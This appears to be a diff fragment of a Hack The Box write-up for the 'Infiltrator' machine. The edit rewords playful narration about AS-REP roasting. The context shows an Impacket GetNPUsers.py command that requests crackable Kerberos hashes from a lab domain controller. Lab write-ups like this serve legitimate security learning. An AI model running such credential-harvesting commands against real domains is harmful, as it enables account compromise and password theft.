bytebl33d/bytebl33d.github.io/writeups/hackthebox/machines/infiltrator.md

 l.clark@INFILTRATOR.HTB
 ```

 Time to get greasy with **ASREPRoasting**.
-We send a lil’ love letter to the domain like “hey, gimme them sweet sweet hashies” — and boom, one account responds like “sure babe, no pre-auth needed!”.
+We send a lil’ love letter to the domain like *"hey, gimme them sweet sweet hashies"*, and boom, one account responds like *"sure babe, no pre-auth needed!"*.
 Yessir!

 ```console
 $ GetNPUsers.py INFILTRATOR.HTB/ -dc-ip 10.10.11.31 -no-pass -usersfile all_ad_users -format hashcat